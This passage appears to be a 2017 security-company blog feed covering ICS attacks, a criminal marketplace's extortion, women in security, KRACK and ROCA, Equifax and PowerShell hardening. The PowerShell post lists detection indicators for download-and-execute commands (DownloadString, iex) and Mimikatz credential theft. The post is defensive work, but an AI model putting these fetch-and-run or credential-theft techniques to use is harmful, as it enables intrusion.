    One final point which is worth bearing in mind is the level of monitoring of ICS systems that is typically in place. Power stations and other systems which are safety critical and are monitored closely by operators. Response procedures are also present. Even in the case of the attack against the Ukrainian power network in December 2015, the power was out for a maximum of 6 hours before the Prykarpattyaoblenergo Company successfully restored power.

    As with many issues in cyber security, we see an evolutionary arms-race playing out between attackers and defenders with each side attempting to gain the upper hand. As for our strawmen, both have their good points, they should remind us of what the strengths and weaknesses of ICS systems are together with a cautionary note to not be complacent.

    Extorters Going to Extort: This Time Other Criminals Are the Victims Thu, 26 Oct 2017 15:52:27 +0000

    We are increasingly used to the tactic of extorting a company through the threat actor publicly releasing data. The recent HBO extortion attempt is a prime example, and actors like thedarkoverlord have also used this approach to a large extent. Digital Shadows has tracked well over 20 of darkoverlord extortion attempts since June 2016. The process is straight forward enough; acquire a company’s valuable data, threaten to release the data if a ransom is not paid, and then put pressure on the victim through sharing the data with journalists. But cybercriminals also face this risk themselves. In this case, a criminal marketplace is the victim of an extortion attempt. Is there any trust left in criminal marketplaces?

    Extorters going to extort 1 

    Fig 1 – An advertisement for basetools on another criminal forum


    On October 24th, a user posted on Pastebin claiming to have accessed customer details and administrator accounts of Basetools, an online criminal marketplace. The user also claimed to have obtained personal details of the administrator and demanded $50,000 in ransom, or he would release further information and the dox of the administrator. The post threatened to inform law enforcement should the payment not be made. At the time of writing, the Basetools market was “under update ” and claimed it would be back in “a few days”.

    Extorters going to extort 2 

    Fig 2 – The message received when accessing Basetools on 25 October 2017


    Basetools is a criminal marketplace that is often advertised within Russian-speaking criminal forums and marketplaces. The site allows vendors and buyers to trade credit card information, customer accounts, and spamming tools. The site claims to offer over 150,000 accounts, 20,000 tools and 24/7 support.

     Extorters going to extort 3

    Fig 3 – A screenshot provided by the extortionist, claiming to show access to the admin support panel

     One motivation behind the threat is clearly financial, but that does not tell the entire story. The actor claims that the administrator of the site has been manipulating the vendors, creating false personas and falsely elevating those vendor profiles to the top of listings.


    What’s the Impact?

    For many years, the criminal marketplace – whether that is on the dark or deep web – has been the preserve of cybercriminals, allowing them to easily advertise and sell their illicit goods. However, this has experienced a significant shift in the past 4 months with the demise of AlphaBay and Hansa marketplaces.

    We have previously forecasted the potential shift from centralized marketplaces to more decentralized models and the conditions that would have to exist for this to become a reality. The attempted extortion of Basetools, and in particular the allegations of a admin manipulating vendor ratings is yet another reason for cybercriminals to reconsider the idea of a centralized market. In a decentralized model, the risk of this occurring would be reduced.

    While the conditions for a decentralized model taking the lead may not yet be there, this may take us one step further. In future posts, we’ll be looking at the recent adoption of the decentralized model and the implications of it.

    Women in Security: Where We Are And Where We Need To Go Wed, 25 Oct 2017 15:34:27 +0000 Ada Lovelace, Grace Hopper, Katherine Johnson, Radia Perlman—some of history’s greatest technical minds have been women. However, since the mid-1980s, there has been a devastating decline in the number of female computer science and engineering graduates. This is even more clearly reflected in the modern workforce—especially within Information Security.

    Women in security 1 

    Source: Pixabay

    While women make up nearly half of the American and European workforces and 40 percent of it worldwide, according to the ISC2017 Women in Cybersecurity report, only 11 percent of global Information Security professionals are women. Many women also have difficulty moving up in their careers, despite reporting higher education levels and qualifications than their male counterparts. Furthermore, at all levels, men also earn more than women, are nine times more likely to be promoted to managerial roles, and four times as likely to hold C-level positions.

     Women in security ICS

    Source: Center for Cyber Safety and Education


    So, why aren’t there more women in security and what’s keeping those of us who are from excelling? While there is no single answer, part of this can be traced back to a trend that became prominent in 80s pop culture, when computers became labeled as something only ‘nerdy’ guys should enjoy—think Revenge of the Nerds, or the more modern-day IT Crowd—where male leads are portrayed as socially awkward and computer-obsessed.

    Women in security IT Crowd

    Source: Pinterest

    In addition, personal computers became a household norm. According to an NPR article entitled, “When Women Stopped Coding,” this trend was seen in much more homes with male children than those with female children. Therefore, the sheer lack of exposure to computers, again, diverted a lot of young women away from an interest in tech. Many more boys grew up with the opportunity to excel in coding, security, and other computer-related disciplines, not only from an early age, but from home—setting a nearly impossible bar for young women to reach.

    As far as the workforce is concerned, tech has quite an unfortunate retention rate for women as well, as many women end up switching careers after some time in a technical role. Personally, before I even took my first security course in undergrad, I was warned by another woman in the field that I would need “a very thick skin” to succeed. She was absolutely correct and this is something I learned quickly on my own, as well. This is not okay and it should absolutely not be the standard.

    Furthermore, according to the ISC2 report, 51 percent of women have experienced discrimination within the field, with only 15 percent of men reporting the same. According to these reports, this also happens even more frequently as women excel in their careers. In addition, while unemployment rates in tech are lower than many other fields, according to Dice, for women it’s the opposite. And with other issues such as pay inequity and gender discrimination, women face a very steep uphill battle if they truly want a future in this field.



    In modern day Silicon Valley, a few women have been willing to speak out against these injustices. Women like Ellen Pao, famous for her gender discrimination lawsuit, and Susan Fowler, for her blog on the toxic working culture for women in tech. However, despite this, little has changed.

    Back to security, with the big push for women to learn how to code at female-focused coding camps like Hackbright and Girls Who Code, the number of female software developers is on the rise. In fact, according to the US Bureau of Labor Statistics, 20 percent of software/web developers are female. However, this same push is not reflected in security, clarified by the aforementioned statistic with only 11 percent of InfoSec professionals being women. This also rings true at events and meetups focused on women in tech. Other women have looked at me strangely and become a bit cliquey in these situations, once I’ve shared that I work in security and not software development. Because of this, women in security can still feel left out, even in a room full of female tech professionals.

    This is very problematic because of an increasing demand for workers with cybersecurity skills. A major lack of women in the field, therefore results in less people to fill these much-needed positions. On top of that, women should be encouraging other women in tech, regardless of their specific discipline.

    According to a study from the “Center for Cyber Safety and Education”, there is a projected gap of 1.8 million unfilled cybersecurity jobs by 2022. A push for women to enter the security workforce would not only aid in closing this, but businesses with a more even distribution of men and women have seen up to a 41 percent increase in revenue. And companies with at least three female directors have seen over a 66 percent increase in invested capital. Workplaces with more gender diversity also see higher customer satisfaction, productivity, and profitability.



    So, how do we change this? I think the first thing that needs to be considered is a strong outreach to young girls. This is not only critical, but needs to begin very early at the elementary level. According to a survey conducted by Microsoft, girls lose interest in STEM when they hit their early teenage years. In addition, 60 percent of them report that they are intimidated by the tech field because of the unequal numbers and stereotypes.

    1. Get engaged at a young age – and stay engaged. It’s important to inspire girls at a young age with hands-on workshops, camps, and other experiences. While coding camps are fantastic, a rise in security camps needs to happen, as well. We need to encourage our young girls who are excited about logic and problem solving to recognize how they can one day make a career out of it. And finally, it needs to be fun. We need to inspire young girls to excel in tech in the same way we do with young boys. The Girl Scouts of America, with their superstar rocket scientist CEO, have teamed up with Palo Alto Networks, and are making strides in the right direction. In 2018, the Girl Scouts will begin offering a range of cybersecurity badges. Hopefully other organizations will begin to follow this example.

    Women in security 4 

    Source: Pixabay

    2. Powerful role models. Another change that needs to happen, is for girls to become less intimidated by the industry itself. Personally, I was always interested in tech, but also terrified by the idea of entering such a male-dominated field. This is enough to dissuade many women from even giving it a chance. A focus on powerful female role models within tech and security is paramount. I’d love to see more lists like this:

     Women in security 5

    Source: Pixabay

    3. Keep up progress where it exists. On a positive note, according to the ISC2 report, millennials may have a chance to change this downward trend due to an increased number of women entering computer science and engineering degree programs. This increase is likely due to the focus on technology, which has occurred within our lifetime. In fact, just last year, more women graduated with engineering degrees than men at Dartmouth, and several other universities are working to follow suit. Last year, the Oracle Academy also pledged $3M and began the international Let Girls Learn initiative with the White House in order to help expose more young girls to STEM.


    Encouragement early on is key, as girls lose interest in tech at a very young age. Inspiring them to embrace their abilities and to recognize the opportunities at hand is an excellent start. Work needs to be put in by people across many industries—whether its security, education, or community organizations—in order to become a driving force to not only embrace women within the field, but to close a very serious, impending employment gap within it, as well. Negative stereotypes about tech need to become a thing of the past, and positive female role models need to be lifted up and exemplified. Without any of this, the cybersecurity industry is going to continue to lack diversity, and soon flounder, as demand increases, but our standards continue to live in the past.

    Trust vs Access: A Tale of Two Vulnerability Classes Fri, 20 Oct 2017 15:32:55 +0000 It’s been a big week in cyberspace, with high profile crypto vulnerabilities KRACK (affecting WPA2) and ROCA (affecting RSA keys generated by Infineon hardware) hitting the news. Not only these mammoth bugs were released, but a new Adobe Flash 0-day exploit was observed in the wild being used to install the FinSpy commercial malware, and finally, the DDE feature in Microsoft Office was found to be open to abuse to gain code execution. There has been a great deal of discussion on Twitter and elsewhere on the comparative severity of the different vulnerabilities and, in particular, how the crypto bugs were not as severe as initially thought.



    I think the vulnerabilities are all interesting in their own way and it’s helpful to delineate the differences between them. Both the crypto bugs represent an attack on trust, that is, they undermine the trust that people and organizations have in security systems to protect them. WPA2 is used almost exclusively to secure WiFi networks around the globe and the consequences of a loss of trust in the protocol are severe. Many organizations will launch vast programs to ensure that they’re protected, equipment will be ripped and replaced and countless meetings will be held on the topic. Even though the risk, as it stands today, is low (a limited Proof of Concept code available and Microsoft Windows is relatively unaffected). In addition, requiring physical access also raises the bar to a successful attack. The perception, however, is that WPA2 is imperiled.

     KRACK logo

    Figure 1 – KRACK attack logo (

    A similar story exists for the ROCA vulnerability. Infineon products are used by many different types of crypto equipment used for software signing, Trusted Platform Managers (TPM), identity documents, certain authentication tokens, etc.. For each RSA key of 1024 or 2048 bit length which has been generated by a piece of hardware, it must first be established if a vulnerable Infineon chip was used to generate the key, secondly, one of the various tools must be used to verify that the key is not easily factorized due to the key generation vulnerability. Due to the prevalence of the vulnerable chips and the diversity of the equipment that they are used in, this verification process will be costly both in terms of money and time.

    ROKA impact 

    Figure 2 – ROCA impact diagram


    This week Kaspersky Lab released a report on the usage of an Adobe Flash 0-day against Middle Eastern targets by the Black Oasis APT actor. The detection of the exploit resulted in Adobe issuing an out-of-band critical patch and the Chrome browser blocking the usage of vulnerable versions of Flash. The exploit was part of an attack that delivered the FinSpy commercial malware to selected targets, most likely for espionage purposes. While this attack demonstrates once again the validity of Adobe’s decision to retire Flash in 2020 and the importance of removing Flash entirely or enforcing click-to-play and mandatory patching, now this attack has been burned, the immediate danger has passed for many users. Anti-virus definitions have been updated, patches issued and many, but obviously not all, endpoints are now protected against this attack. The real danger of such exploits is, once they’ve been found in the wild, they often find their way into Exploit Kits and other attack toolkits which are used to exploit unpatched systems.

    Adobe security update for CVE 2017 11292 

    Figure 3 – Adobe security update for CVE-2017-11292

    The final big news story was the discovery by SensePost of a method of gaining remote code execution from Microsoft Office documents by abusing a legacy feature called DDE. In a method similar to VBA macros or OLE embedded objects in Microsoft Office, the DDE technique does not require exploitation of a vulnerability, but rather rests on a user clicking through a confusing prompt which permits the attacker’s payload to be executed. While SensePost contacted Microsoft concerning the issue, it was deemed that the DDE feature was working as expected and would not be immediately patched. Numerous attacks have already been observed in the wild using this technique and, so far, many defenders are struggling to keep attackers using this approach out of their networks.

    Prompt separating the user from system compromise

    Figure 4 – Prompt separating the user from system compromise

    The crypto attacks KRACK and ROCA are very different in their impact compared to the Adobe Flash 0-day and the Microsoft Office DDE issue. The crypto attacks are attacks on trust. Organizations deploying WPA2 and RSA-based encryption have to rely on the supply chain providers performing their due diligence on the products that they provide. This applies particularly to the ROCA attack where it is still unknown the full extent of the issue. More and more products are being discovered as generating vulnerable keys and we can expect that we will be having to check for weak keys for a long time to come.

    The Flash 0-day and DDE issue are ways for attackers to gain initial access to a network, mitigations exist in terms of patching or disabling features, but once they have been dealt with, an organization can have a reasonable amount of confidence that they are resilient against attacks using these particular vectors. However, the uncertainty spread by attacks which undermine systems we use for protection is more insidious. The trust we have in these systems turns out to have been misplaced.

    When assessing the impact of a vulnerability, it is worth keeping in mind what the consequences of the vulnerability are:

    • Is it a tool for providing unauthorized access to an attacker?
    • Or is it undermining the trust we have in the security systems we have built?

    In terms of response, if unauthorized access to our networks is discovered, the response can be tactical and immediate, that is, a standard incident response. The response to an attack on trust must be more long-term and strategic. It must take into account the uncertainty around the lifetime and impact of the issue, these attacks on trust may live on for years in the most unexpected places.

    Key Reinstallation Attacks (KRACK): The Impact So Far Mon, 16 Oct 2017 15:02:12 +0000 Today, a series of high-severity vulnerabilities affecting the WiFi Protected Access II (WPA2) protocol were disclosed. Security researchers have developed a proof of concept (POC) demonstration, dubbed “KRACK”, and a dedicated website through which further details are likely to be released.

    An advisory was distributed by the US CERT to a select number of unidentified organizations stating the following malicious activities could occur should an attacker successfully exploit the vulnerabilities: decryption, packet relay, TCP connection hijacking, and HTTP content injection attacks.

    Here’s what we know – and do not yet know – so far.



    It’s likely that a large number of devices which use WiFi are exposed to this vulnerability, but only works if the attacker is within the victim’s network range. However, an attack requires the physical presence of an attacker to the victims’ network.



    Fig 1 – A screenshot of a POC demonstration for KRACK. Source: hxxps://www[.]youtube[.]com/watch?time_continue=13&v=Oh4WURZoR98


    Researchers have demonstrated a proof of concept (POC) attack, dubbed “Krack attack”, targeting an Android smartphone; a video for which showed how all the data transmitted by the victim could be decrypted. The video showed a plaintext downgrade attack against TLS/SSL via sslstrip Details of this are available on a dedicated website; hxxps://www[.]krackattacks[.]com/. Linux and Android versions 6.0 and above are particularly effected, though the list of vulnerable devices is extensive.

    Some wireless manufacturers have already developed patches to mitigate against this threat, with Bleeping Computerand US CERT having published useful lists on the latest firmware and driver updates.



    While there is a proof of concept demonstration, there was no proof of concept code released, and no public indication these vulnerabilities had been exploited in the wild. Although the POC video gave a good overview of the exploit, the exact technical knowledge required to successfully conduct this type of attack is unknown.

    We have not yet observed the vulnerability exploited in the wild, although criminals have showed an interest. This is confirmed by conversations on criminal forums, with users interested – yet skeptical – of finding a quick exploit.


    KRACK Forum  

    Fig 2 – Discussion of KRAK on a criminal forum


    The US CERT reiterates that the vulnerabilities could potentially be used to conduct arbitrary packet decryption and injection, TCP connection hijacking, HTTP content injection, or the replay of unicast, broadcast, and multicast frames by conducting a man-in-the-middle (MiTM) style attack. Of course, not all devices are equally affected, but the research paper outlines these differences.

    In order to manage the risk, here’s five steps organizations can take:

    1. Enumerate connected devices. Use your wireless control software to enumerate all connected devices and create an inventory. The connected devices will give an indication of the risk posed. Look out for internet of things, such as printers, and any Android or embedded Linux devices.
    2. Patch your vulnerable connected devices. The first priority is, predictably, to patch vulnerable devices. More patches are expected over the next 24 hours, so monitor for updates. As mentioned earlier in the blog, Bleeping Computer and US CERT have both provided good updates on this.
    3. Adopt a second layer of security. Despite well-known issues with some VPNs, having non-wired internet users connected by VPN is a good interim measure. Adopting cryptographic protocols, such as Transport Layer Security (TLS/SSL), is another option.
    4. Consider a wired connection. Based on the extent to which your connected devices are vulnerable, consider switching to an Ethernet connection. While this might not be scalable for an enterprise campus, it is a consideration should the severity increase over the upcoming days.
    5. Stay up-to-date on the latest KRACK news. There will be more to come, so stayed tuned for further updates.

    Stay up to date with our research. Subscribe here to receive the latest industry news, threat intelligence and security resources.

    Simply Put, Effective Cybersecurity is the Strength Sum of Its Parts Wed, 11 Oct 2017 14:50:10 +0000 Today’s cybersecurity landscape, dominated as it is by professional threat actors, state sponsored attackers and hacktivists, requires a more consistent and integrated approach from governments and businesses around the world to technology vendors. Having the very best solution remains critical, but if it is isolated inside a corporate infrastructure, the bad guys will likely eventually find a way around it.

    Meaningful partnerships with an integrated technology approach bring together best of breed solutions in a manner that enterprises can greatly improve their overall security posture, reducing overall exposure and protecting investment.

    We recognize that while Digital Shadows’ SearchLight solution remains a market leader in digital risk management solving several significant challenges for customers today, by working with market leading technology partners we can offer our mutual customers an incrementally more effective solution to combat the threat of cybersecurity.

    This is why we are excited that today we announced our Digital Risk Management Technology Ecosystem featuring 11 leading security technology companies, with more expected to join in the coming months. We have spent months working diligently to locate partners who all share a vision for how security analytics and security information and event management (SIEM), product orchestration and automation, risk and compliance, intelligence and network enforcement, must work together to best protect customers from today’s digital risks.

    Our initial ecosystem members will bring their individual, industry-proven strengths to enhance Digital Shadows’ intelligence and digital risk management capabilities which extend across the widest range of data sources within the open, deep and dark web to protect customers around the world.

    Just last month we announced similar partnerships with Splunk and ServiceNow and we are convinced that these kinds of alliances and partnerships are the best way to protect our customers around the world so they can maximize and tap the huge benefits the digital economy brings.

    To learn more, read our full press release here.

    Simple Steps to Online Safety Thu, 05 Oct 2017 14:48:15 +0000 On the heels of some very high-profile and disturbing data breaches, this year’s Cyber Security Awareness Month is timely. This October comes after the announcements of major data breach announcements from Equifax, Deloitte and the Securities and Exchange Commission, and with the increased publicity and impact of social media, the attention and respect that cyber security, information security and data security deserves is starting to pick up steam.

    The first step in making changes is building awareness, and this blog in relation to National Cyber Security Month’s Week 1 theme ‘Simple steps to online safety’. This will help consumers understand the threats and how to protect themselves, including what to do if they become a victim of cyber-crime.

    Protecting yourself online may seem impossible, but following simple guidelines like enabling stronger authentication, strong password management, and regular update installation can do wonders to protect you from cybercrime.

    Enable Stronger Authentication

    1. Extra layers of security beyond a password are available from most email providers, social media platforms, and financial institutions. Taking advantage of this multifactor authentication helps assure authorized access to all accounts. Remember that all MFA isn’t made equal; MFA that relies on SMS comes with problems of its own.

    Interconnecter SS7

    Figure 1 – An advertisement for SS7 bypass services on the dark web

    2. Install updates for apps and software on your devices as soon as they are available. Keeping software up to date will prevent cybercriminals from taking advantage of known vulnerabilities.

    3. Do not open emails, links, or attachments from strangers. Phishing attacks often use email or malicious websites or links to infect your device with malware, which can gain access to personal and financial information or accounts.

    Remain Skeptical

    1. As a consumer, stay skeptical. Unless you are dealing with a known and reputable company, those amazing deals are probably amazing frauds. Fake shopping websites are very sophisticated with professional designs often mimicking legitimate sites.

    Online fraudulant goods

    Figure 2 – An advertisement for fraudulent goods on the dark web. Not all offers will be this obvious!

     The domain name is the best giveaway – look out for those that are long, with lots of hyphens, slashes, or special characters that include popular brands or stores, but with extra letters or numbers (e.g., www[.]cheapapp1estuff[.]com).

    3. Also, the URL in the checkout section should start with https:// and have a padlock icon to the left of it indicating SSL encryption; exit immediately if it doesn’t. (Equally, remember that the presence of a padlock icon does not make the site definitely secure!) Don’t assume that links from trusted sites confer legitimacy: Facebook ads have linked to bogus Ray-Ban sites and Instagram promoted a phishing site that lured buyers with discounted Adidas and Coach merchandise.

    Do Your Research On IoT And UPNP Devices

    1. DDoS attacks are only one possible threat from infected IoT devices, and the diversity amongst IoT hardware and software make them extremely difficult to secure. Most IoT devices are meant to be install-and-forget and were not built with patching and updating in mind, thus security maintenance is very challenging if not impossible.

    2. No one is suggesting that you strike those smart TVs or personal drones off your holiday shopping list, but it is imperative for consumers to stay informed. Do your homework – read online reviews and make sure you’re aware of any security issues. The first time you turn the device on, change default passwords and check for updates and patches. Make sure your home Wi-Fi network is secure and avoid public Wi-Fi when possible.

    Use Common-Sense

    1. When shopping online, use a credit card, not debit, to limit your losses in case of fraud. Don’t make purchases or check bank statements over public Wi-Fi, as malicious actors can intercept data, capture your web traffic, or redirect you to malware or phishing sites. If you use public Wi-Fi frequently, consider encrypting your traffic via a personal VPN connection service. Monitor your bank and credit card transactions frequently and set alerts for suspicious activity.

    All members of the public can take some simple actions to protect themselves online and to recover in the event a cyber incident occurs. Cybercriminals often prey on human error – such as people clicking on a link in a phishing email or using weak or repetitive passwords – to gain access to a home networks and financial or social media accounts. You can’t eliminate every risk, but you can keep yourself safer while enjoying this connected world.

    Gearing Up For National Cyber Security Awareness Month Tue, 03 Oct 2017 14:34:01 +0000 I’m going to go out on a limb and say that I’m probably not the only one that’s pleased to see the back of September. The cinders of Equifax breach continue to fall into October and, irrespective of the identities of the actors behind the breach, the impact of the exposed 143 million Social Security Numbers will have a long tail.

    National Cyber Security Month

    In light of this, it’s probably a good time to reflect on the current state of security. Which is just as well, given that we’re two days into the first week of the annual National Cyber Security Month (U.S.) and CyberSecMonth (Europe). It’s a great opportunity to look at ways to overcome the challenges we face. As a reminder, here’s the weekly themes for the U.S. and European respective security awareness months.

    Date United States Theme European Theme
    Week 1: Oct 2-6 Simple Steps to Online Safety Cyber Security in Workplace
    Week 2: Oct 9-13 Cybersecurity in the Workplace is Everyone’s Business Governance, Privacy & Data Protection
    Week 3: Oct 16-20 Today’s Predictions for Tomorrow’s Internet Cyber Security in the Home
    Week 4: Oct 23-27 The Internet Wants YOU: Consider a Career in Cybersecurity Skills in Cyber Security
    Week 5: Oct 30-31 Protecting Critical Infrastructure from Cyber Threats


    The U.S. and European themes do differ a little, but there are three common themes which apply to all organizations across the world.

    1. Increase In Connected Devices, And The Difficulty Of Managing The Risk

    Social media, mobile computing and cloud services have increased the ease and speed of communication, while simultaneously reducing the cost. The “internet of things” looks to add further complexity to this, with some forecasts claiming there will be 200 billion connected devices by 2020.

    This is tricky for organizations to manage, especially when they don’t directly control the flow of information. Employees, suppliers and other third parties are all sharing and exposing sensitive information. Keeping track of what data is shared and when it becomes exposed can cause regulatory headaches, privacy concerns and, ultimately, loss of revenue.

    2. Security Is An Issue Beyond The Security Department

    Week 2’s theme is “Cybersecurity in the Workplace is Everyone’s Business”, which ties into two main areas: building a culture of cybersecurity and security as a strategic issue.

    Building a culture of cybersecurity is something we’ve written about a good amount (here you can read our blogs on Security Culture and Resilience). This is important to ensure every individual within the organization is vigilant and feels like they can report security issues. Security isn’t something that starts and stops at the SOC.

    As Equifax’s share price is testament to, security has strategic implications and, as such, it should be strategically driven. Boards need to understand that weaknesses in an organization’s security posture can have significant strategic implications. At the same time, employees need to do a better job of communicating this risk to the board.

    3.  Security Teams Are Held Back By A Skills Shortage

    In his keynote presentation at the 2017 SANS CTI Summit, Cliff Stoll recalled that he and his team had “Zero budget, zero expertise and zero mandate.” While Cliff was talking about the 1980s, these three challenges remain.

    Hiring good people and building up expertise remain some of the biggest challenges, which is why it’s great to see the focus on skills shortage. The underrepresentation of women in security is a problem that continues to plague the industry, and we’ll be digging deeper into this in Week 2.

    However, a lack of diversity extends beyond gender inequality; it includes the need to train individuals from diverse backgrounds. Having a broader range of backgrounds and skills is important in helping teams avoid falling into groupthink and other cognitive biases.

    We’ll be publishing blogs on these weekly themes, so stay tuned.

    2017 Equifax Breach: Impact and Lessons Learned Thu, 28 Sep 2017 14:24:23 +0000 Equifax experienced a data breach that occurred in mid-May 2017, was first discovered on 29 Jul 2017, and was publicly disclosed by the company on 07 Sep 2017. The breach affected 143 million individuals in the United States, Canada and the United Kingdom. Immediately after the disclosure Equifax faced widespread criticism from the media, researchers and customers. There have also been allegations of insider trading and legal implications. In our paper Equifax Breach: Lessons Learned for Your Organizations, we outline how the events surrounding the breach demonstrate several important learning points organizations can use to inform their own security posture.

    EquifaxReport Lessons Learned

    The largest immediate impact to Equifax was loss of investor confidence; the share price dropped 34 percent within eight days after the breach disclosure. The company also risks revenue loss resulting from reduced business, especially considering customers’ loss of confidence in the company to secure data. As with all data breaches, Equifax will also incur financial losses through its responsive investigations and, likely, costs resulting from lawsuits.

    Swift public criticism followed around Equifax’s security posture, its handling of the breach and the exposure of the sensitive customer data. Some employees have been accused of insider trading, and others have reportedly left their positions, such as the chief security officer and chief information officer. Reputational damage may have a mid- to long-term effect on the company’s revenue generation and a prolonged impact on its finances.

    The key lessons organizations can learn from this event are:

    • Maintain an external view of your digital footprint to be aware of what an attacker can access, what is vulnerable to attack and what methods attackers are using against your sector.
    • Establish and maintain a threat intelligence program, and act on the intelligence; Digital Shadows provided clients with multiple alerts about exploitation of the vulnerability that affected Equifax, prior to the intrusion.
    • Implement and follow general cyber-security good practice measures, such as defense-in-depth and including vulnerability management. Plan as if an attacker will compromise your network and ensure your sensitive information will be protected.
    • Assume a breach will occur and plan for this outcome. Ensure people, processes and strategy are in place in advance of it.
    • Control knowledge of a breach to trusted individuals and prepare for announcements by analyzing the possible consequences of decisions.
    • Communicate clearly when a breach happens, stating the knowns and unknowns publicly. Speculation from media and researchers can damage reputation.
    • Look for your compromised data online, to try to discern the attacker’s motive. Understanding whether the motive was financial gain may help mitigate against prolonged malicious activity.

    Download a copy of our paper to learn more about the impact of the breach and the lessons organizations can learn at three different stages: pre-breach, post-discovery and post-disclosure.

    PowerShell Security Best Practices Wed, 27 Sep 2017 12:45:18 +0000 Threat actors have long since used legitimate tools to infiltrate and laterally move across defender’s networks. The reasons for this are clear; the likelihood of being detected is much lower when authorized tools are leveraged instead of malicious tools that might trigger prevention or detection controls. PowerShell attributes have also made it attractive to adversaries, having been used most recently in the Petya/NotPetya campaign. In this blog, we will cover some PowerShell best practices that will prepare you for adversaries who will use your own PowerShell implementation against you.


    PowerShell is an automation platform and scripting language for Microsoft Windows and Windows Server, which allows you to simplify your system management. Unlike other text-based shells, PowerShell harnesses the power of Microsoft’s .NET Framework, providing rich objects and a massive set of built-in functions to take control of your Windows environments.

    Windows PowerShell


    PowerShell has been used heavily for cyber attacks, especially recently during the Petya/NotPetya campaigns. The most important aspect for attackers is its native integration with the .NET Framework, which offers multiple options for infecting or manipulating the target.

    PowerShell’s most attractive attributes to adversaries are:

    • Simple access to network sockets
    • Ability to assemble malicious binaries dynamically in memory
    • Direct access to the Win32 Application Programming Interface (API)
    • Simple interface with Windows Management Instrumentation (WMI)
    • Powerful scripting environment
    • Dynamic, runtime method calls
    • Easy access to crypto libraries, e.g. IPSec, hashing algorithms
    • Ability to hook managed code
    • Simple bindings to Component Object Model (COM) (

    All the above render PowerShell an extremely effective attack vector.

    PowerShell was initially mentioned as an attack platform in 2010 (, when it was presented at Def Con 18 as proof of concept. Both a bind and reverse shell programmed purely in PowerShell were demonstrated in the same context.

    There are numerous attack tools – like Nishang, PowerSploit, and PowerShell Empire platform (www.PowerShellempire[.]com)  –  that offer a post-exploitation agent built on cryptological communications. These tools can be used for reconnaissance, persistence, and lateral movement, as well as other offensive techniques. Of course, given its native capabilities, PowerShell can be programmed in multiple ways, providing custom tools and techniques to remain stealthy and undetected by common security controls and countermeasures.

    Adversarial Tactics, Techniques & Common Knowledge, or ATT&CK by Mitre, which provides an extensive list of attack vectors, tactics, and techniques, describes PowerShell as a powerful interface that adversaries can use to perform a variety of actions, and provides real-world examples.


    Given that PowerShell cannot be disabled or removed from organizations that require it, the following actions are the recommended best practices to use PowerShell efficiently while preventing its use as an attack vector.

    1. PSLockDownPolicy And PowerShell Constrained Language Mode

    Constrained language mode limits the capability of PowerShell to base functionality, removing advanced feature support, such as .NET and Windows API calls and COM access. This lack of advanced functionality stops most PowerShell attack tools, because they rely on these methods. However, in enterprise environments it can negatively affect legitimate scripts; thus it is highly recommended to schedule a testing period before activating this option, to filter out the legitimately used code.

    Enable Constrained Language Mode:
    [Environment]::SetEnvironmentVariable(‘__PSLockdownPolicy‘, ‘4’, ‘Machine‘)

    Enable via Group Policy:
    Computer Configuration\Preferences\Windows Settings\Environment (

    2. PowerShell V.5 With Applocker And Device Guard

    PowerShell v.5 comes with significant embedded security features that make its use more secure for enterprise environments. These security features include:

    • Script block logging. Script block logging provides the ability to log de-obfuscated PowerShell code to the event log.
    • System-wide transcripts. System-wide transcription can be enabled via Group Policy and provides an “over the shoulder” transcript file of every PowerShell command and code block executed on a system by every user on that system.
    • Constrained PowerShell. Constrained Language mode (as described above in best practice 1).
    • Antimalware integration (Windows 10). The new Windows 10 Antimalware Scan Interface (AMSI) enables all the scripting engines (PowerShell, VBScript, and JScript) to request analysis of dynamic content: from a script file, typed commands at the command line, and even code downloaded and executed in memory. This enables scanning of PowerShell code before it is executed on the computer.

    In addition, using Applocker to block executables from unwanted user locations will provide better control.

    Device Guard which is also applicable on Windows 10 and Windows Server 2016 can be used to enforce constrained language mode and application whitelisting by leveraging advanced hardware features where supported. (

    3. Logging PowerShell Activity

    PowerShell logging can be enabled via Group Policy for PowerShell modules:

    • Microsoft.PowerShell.* (i.e., Microsoft.PowerShell.Management module) – Logs most of PowerShell’s core capability.
    • ActiveDirectory – Logs Active Directory cmdlet use. A lightweight Windows PowerShell script that performs a single function.
    • BITS Transfer – Logs use of Background Intelligent Transfer Service (BITS) cmdlets.
    • CimCmdlets (2012R2/8.1) – Logs cmdlets that interface with Common Information Model (CIM).
    • GroupPolicy – Logs Group Policy cmdlet use.
    • Microsoft.WSMan.Management – Logs cmdlets that manage Web Services for Management (WS-Management) and Windows Remote Management (WinRM).
    • NetAdapter/NetConnection – Logs Network-related cdmdlets.
    • PSScheduledJob/ScheduledTasks (PSv5) – Logs cmdlets to manage scheduled jobs.
    • ServerManager – Logs Server Manager cmdlet use.
    • SmbShare – Logs Server Message Block (SMB) sharing activity.

    For these logs to be useful, they need to be fed into a central logging system with alerts configured for known attack methods.

    Relevant activity:

    • Downloads via .Net (New-Object Net.WebClient).DownloadString)
    • Invoke-Expression (and derivatives: “iex”)
    • BITS activity 
    • Scheduled Task creation/deletion
    • PowerShell Remoting

    The best method to detect PowerShell attack code is to look for key indicators – code snippets required for the code to run correctly.

    Example: Detecting Mimikatz (a widely-used tool for logged user credential capture)
    Invoke-Mimikatz Event Log Keywords:


    “System.Reflection.Emit.AssemblyBuilderAccess “




    For obfuscated PowerShell, custom rules should be developed. For example:

    • Look for lots of brackets { }
    • Look for lots of quote marks ‘ ”

    Both of these are heavily used in obfuscation techniques and usually are not used by legitimate software or normal administrators.

    4. Remove PowerShell V.2

    It is obvious that the security features integrated in the latest versions of PowerShell do not apply to v.2, which makes its use very attractive to adversaries; PowerShell v.2 can be used for lateral movement and persistence techniques with the same functionality. PowerShell v.2’s extra value is that because it does not have native logging capabilities, it remains undetected and offers stealth in attacker operations.

    For that and other reasons Microsoft has recently announced that PowerShell v.2 will be deprecated from the next Windows 10 Update which is scheduled for this September (, so either way it is highly recommend to check and remove PowerShell v.2 from your environment.

    You can check whether Windows PowerShell 2.0 is installed by running the following (as an administrator).

    • On Windows 7/8.1/10, the following will return a State as either Enabled or Disabled:
      • Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2
    •  On Windows Server, the following will return an InstallState of either Installed or Removed:
      • Get-WindowsFeature PowerShell-V2

    5. Just Enough Administration – JEA

    This is included with the latest update of Windows Management Framework 5.0 and 5.1, and is a security technology that helps organizations enforce information security by restricting IT administrative rights. JEA provides a practical, role-based approach to set up and automate restrictions for IT personnel, and reduces the risks associated with providing users with full administrative rights following the principle of least privilege.

